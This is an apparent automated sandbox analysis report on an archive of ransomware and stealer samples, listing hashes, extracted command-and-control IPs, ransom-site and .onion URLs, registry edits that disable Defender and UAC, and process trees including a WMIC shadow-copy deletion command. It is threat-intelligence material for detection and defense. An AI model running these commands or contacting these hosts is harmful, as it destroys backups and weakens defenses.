Analysis
-
max time kernel
86s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-10-2024 12:08
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00434.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00434.7z
-
Size
16.1MB
-
MD5
e37bb4ebaf0d415c7684817e3dc11099
-
SHA1
060136443c2979ed9f8b8a0b48c3c337db2231a6
-
SHA256
77641998342582b73bcfe6d0e223187d46ad5e9da3db68bbb8aa16a4d3f47a60
-
SHA512
dc5c96964884ee514ee518253cce117d1429eff3c98c2ff2036d328efdcbe9e6e0d962891481aa17c89b293668f92f3d7bebcc2b6810c17e63d3a9fbf319054a
-
SSDEEP
393216:CHLWLyEAHXGO6IVyNwR0qDQ6j3F+SAxM1sjwiWykdn:CqyHm7q0cYfxMz5ykdn
Malware Config
Extracted
crimsonrat
5.189.134.216
Extracted
azorult
http://host1714380.hostland.pro/index.php
Extracted
C:\Program Files\dotnet\Restore-My-Files.txt
lockbit
http://lockbit-decryptor.top/?81E8147429949C38D431BE7AA02CD87A
http://lockbitks2tvnmwk.onion/?81E8147429949C38D431BE7AA02CD87A
Extracted
urelas
1.234.83.146
133.242.129.155
218.54.31.226
218.54.31.165
112.175.88.207
112.175.88.208
Extracted
C:\ProgramData\readme.txt
conti
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/
https://contirecovery.top/
Extracted
C:\Users\Default\Downloads\247544-Readme.txt
http://pb36hu4spl6cyjdfhing7h3pw6dhpk32ifemawkujj4gp33ejzdq3did.onion
http://rnfdsgm6wb6j6su5txkekw4u4y47kp2eatvu7d6xhyn5cs4lt4pdrqqd.onion
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
-
Conti family
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023c70-137.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
Urelas family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 7036 bcdedit.exe 4376 bcdedit.exe -
pid Process 5784 wbadmin.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2540 netsh.exe 9096 netsh.exe -
Executes dropped EXE 9 IoCs
pid Process 452 HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe 4752 HEUR-Trojan-Ransom.MSIL.Foreign.gen-98894973a86aa01c4f7496ae339dc73b5e6da2f1dbcd5fe1215f70ea7b889b85.exe 4860 HEUR-Trojan-Ransom.MSIL.Gen.gen-d60bf63416c2b63cb1940b365baeab8281c60bf327df398eca9acf84bd9a83b5.exe 3612 HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe 2460 HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe 1516 MsMpEng.exe 4156 HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe 2720 HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe 4700 HEUR-Trojan-Ransom.Win32.Generic-8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MinimalX = "1" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
Loads dropped DLL 1 IoCs
pid Process 1516 MsMpEng.exe -
resource yara_rule behavioral1/files/0x0007000000023c7a-219.dat vmprotect behavioral1/memory/3056-331-0x0000000000ED0000-0x0000000001B86000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ransom = "C:\\Users\\Admin\\Desktop\\00434\\HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
pid Process 14688 powershell.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File created C:\Users\Admin\Desktop\desktop.ini HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\Desktop\Wallpaper HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
resource yara_rule behavioral1/files/0x0007000000023c7f-3985.dat upx behavioral1/memory/5248-4005-0x0000000000400000-0x0000000000489000-memory.dmp upx behavioral1/memory/5248-5381-0x0000000000400000-0x0000000000489000-memory.dmp upx -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5176 sc.exe 5268 sc.exe 956 sc.exe 5644 sc.exe 3972 sc.exe 6752 sc.exe 6420 sc.exe 1252 sc.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 6316 1044 WerFault.exe 139 -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Gen.gen-d60bf63416c2b63cb1940b365baeab8281c60bf327df398eca9acf84bd9a83b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsMpEng.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6768 vssadmin.exe -
Kills process with taskkill 23 IoCs
pid Process 2832 taskkill.exe 14100 taskkill.exe 14076 taskkill.exe 4100 taskkill.exe 6704 taskkill.exe 5584 taskkill.exe 6640 taskkill.exe 9376 taskkill.exe 7000 taskkill.exe 10152 taskkill.exe 17152 taskkill.exe 17664 taskkill.exe 10340 taskkill.exe 6396 taskkill.exe 12412 taskkill.exe 5912 taskkill.exe 6400 taskkill.exe 228 taskkill.exe 5928 taskkill.exe 2708 taskkill.exe 9992 taskkill.exe 6816 taskkill.exe 5520 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5144 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 1760 taskmgr.exe 1760 taskmgr.exe 1760 taskmgr.exe 1760 taskmgr.exe 1760 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe 1688 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4808 7zFM.exe 1688 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
description pid Process Token: SeRestorePrivilege 4808 7zFM.exe Token: 35 4808 7zFM.exe Token: SeSecurityPrivilege 4808 7zFM.exe Token: SeDebugPrivilege 3356 taskmgr.exe Token: SeSystemProfilePrivilege 3356 taskmgr.exe Token: SeCreateGlobalPrivilege 3356 taskmgr.exe Token: SeDebugPrivilege 3444 taskmgr.exe Token: SeSystemProfilePrivilege 3444 taskmgr.exe Token: SeCreateGlobalPrivilege 3444 taskmgr.exe Token: 33 3356 taskmgr.exe Token: SeIncBasePriorityPrivilege 3356 taskmgr.exe Token: SeDebugPrivilege 1760 taskmgr.exe Token: SeSystemProfilePrivilege 1760 taskmgr.exe Token: SeCreateGlobalPrivilege 1760 taskmgr.exe Token: 33 3444 taskmgr.exe Token: SeIncBasePriorityPrivilege 3444 taskmgr.exe Token: SeDebugPrivilege 1688 taskmgr.exe Token: SeSystemProfilePrivilege 1688 taskmgr.exe Token: SeCreateGlobalPrivilege 1688 taskmgr.exe Token: 33 1760 taskmgr.exe Token: SeIncBasePriorityPrivilege 1760 taskmgr.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeDebugPrivilege 3988 powershell.exe Token: SeBackupPrivilege 2744 vssvc.exe Token: SeRestorePrivilege 2744 vssvc.exe Token: SeAuditPrivilege 2744 vssvc.exe Token: SeDebugPrivilege 452 HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4808 7zFM.exe 4808 7zFM.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3356 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe 3444 taskmgr.exe 1760 taskmgr.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 3356 wrote to memory of 3444 3356 taskmgr.exe 102 PID 3356 wrote to memory of 3444 3356 taskmgr.exe 102 PID 3444 wrote to memory of 1760 3444 taskmgr.exe 103 PID 3444 wrote to memory of 1760 3444 taskmgr.exe 103 PID 1760 wrote to memory of 1688 1760 taskmgr.exe 104 PID 1760 wrote to memory of 1688 1760 taskmgr.exe 104 PID 3988 wrote to memory of 1388 3988 powershell.exe 116 PID 3988 wrote to memory of 1388 3988 powershell.exe 116 PID 1388 wrote to memory of 452 1388 cmd.exe 117 PID 1388 wrote to memory of 452 1388 cmd.exe 117 PID 1388 wrote to memory of 4752 1388 cmd.exe 118 PID 1388 wrote to memory of 4752 1388 cmd.exe 118 PID 1388 wrote to memory of 4860 1388 cmd.exe 119 PID 1388 wrote to memory of 4860 1388 cmd.exe 119 PID 1388 wrote to memory of 4860 1388 cmd.exe 119 PID 1388 wrote to memory of 3612 1388 cmd.exe 120 PID 1388 wrote to memory of 3612 1388 cmd.exe 120 PID 1388 wrote to memory of 3612 1388 cmd.exe 120 PID 1388 wrote to memory of 2460 1388 cmd.exe 121 PID 1388 wrote to memory of 2460 1388 cmd.exe 121 PID 1388 wrote to memory of 2460 1388 cmd.exe 121 PID 2460 wrote to memory of 1516 2460 HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe 122 PID 2460 wrote to memory of 1516 2460 HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe 122 PID 2460 wrote to memory of 1516 2460 HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe 122 PID 1388 wrote to memory of 4156 1388 cmd.exe 123 PID 1388 wrote to memory of 4156 1388 cmd.exe 123 PID 1388 wrote to memory of 4156 1388 cmd.exe 123 PID 4156 wrote to memory of 3804 4156 HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe 127 PID 4156 wrote to memory of 3804 4156 HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe 127 PID 4156 wrote to memory of 3804 4156 HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe 127 PID 1388 wrote to memory of 2720 1388 cmd.exe 129 PID 1388 wrote to memory of 2720 1388 cmd.exe 129 PID 1388 wrote to memory of 2720 1388 cmd.exe 129 PID 3804 wrote to memory of 4464 3804 cmd.exe 159 PID 3804 wrote to memory of 4464 3804 cmd.exe 159 PID 3804 wrote to memory of 4464 3804 cmd.exe 159 PID 4464 wrote to memory of 2436 4464 net.exe 133 PID 4464 wrote to memory of 2436 4464 net.exe 133 PID 4464 wrote to memory of 2436 4464 net.exe 133 PID 3612 wrote to memory of 3436 3612 HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe 135 PID 3612 wrote to memory of 3436 3612 HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe 135 PID 1388 wrote to memory of 4700 1388 cmd.exe 134 PID 1388 wrote to memory of 4700 1388 cmd.exe 134 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00434.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4808
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /13⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /14⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe3⤵
- Modifies WinLogon for persistence
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:452
-
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.MSIL.Foreign.gen-98894973a86aa01c4f7496ae339dc73b5e6da2f1dbcd5fe1215f70ea7b889b85.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-98894973a86aa01c4f7496ae339dc73b5e6da2f1dbcd5fe1215f70ea7b889b85.exe3⤵
- Executes dropped EXE
PID:4752
-
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.MSIL.Gen.gen-d60bf63416c2b63cb1940b365baeab8281c60bf327df398eca9acf84bd9a83b5.exeHEUR-Trojan-Ransom.MSIL.Gen.gen-d60bf63416c2b63cb1940b365baeab8281c60bf327df398eca9acf84bd9a83b5.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4860
-
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete4⤵PID:3436
-
C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete5⤵PID:2608
-
-
-
-
C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exeHEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2460 -
